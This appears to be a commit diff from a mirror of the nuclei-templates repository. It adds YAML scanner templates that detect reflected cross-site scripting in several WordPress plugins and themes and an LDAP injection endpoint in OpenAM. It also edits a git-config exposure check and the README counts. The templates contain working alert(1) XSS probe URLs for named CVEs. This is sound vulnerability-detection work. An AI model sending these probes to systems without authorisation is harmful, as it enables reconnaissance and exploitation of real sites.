daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
Muhammad Daffa 2021-07-12 14:58:59 +07:00 committed by GitHub
parent 361a641483 74db4223c1
commit 0e195c4138
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
11 changed files with 231 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 388 | vulnerabilities | 214 | exposed-panels | 192 |
| cves | 394 | vulnerabilities | 216 | exposed-panels | 192 |
| takeovers | 70 | exposures | 112 | technologies | 115 |
| misconfiguration | 74 | workflows | 33 | miscellaneous | 27 |
| default-logins | 37 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 15 |
**127 directories, 1465 files**.
**127 directories, 1473 files**.
</td>
</tr>

29
cves/2013/CVE-2013-3526.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2014/CVE-2014-9094.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-9094
info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
cves/2017/CVE-2017-5487.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2017-5487
info:
name: WordPress Core < 4.7.1 - Username Enumeration
author: Manas_Harsh,daffainfo
severity: medium
severity: info
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference: |

31
cves/2019/CVE-2019-14470.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2019-14470
info:
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2019/CVE-2019-15889.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-15889
info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2020/CVE-2020-29395.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-29395
info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

21
cves/2021/CVE-2021-29156.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2021-29156
info:
name: LDAP Injection In Openam
author: melbadry9,xelkomy
severity: high
tags: cve,cve2021,openam
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
requests:
- method: GET
path:
- "{{BaseURL}}/openam/ui/PWResetUserValidation"
- "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation"
- "{{BaseURL}}/ui/PWResetUserValidation"
matchers:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'

12
exposures/configs/git-config.yaml
View File

@ -19,23 +19,11 @@ requests:
Content-Length: 1
Connection: close
- |
GET /.git/logs/HEAD HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "[core]"
- "root"
condition: or
- type: dsl
dsl:

29
vulnerabilities/wordpress/wp-ambience-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-ambience-xss
info:
name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/38568
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
matchers-condition: and
matchers:
- type: word
words:
- "<body onload=alert(1)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
vulnerabilities/wordpress/wp-securimage-xss.yaml Normal file
View File

@ -0,0 +1,29 @@
id: wp-securimage-xss
info:
name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/59816/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200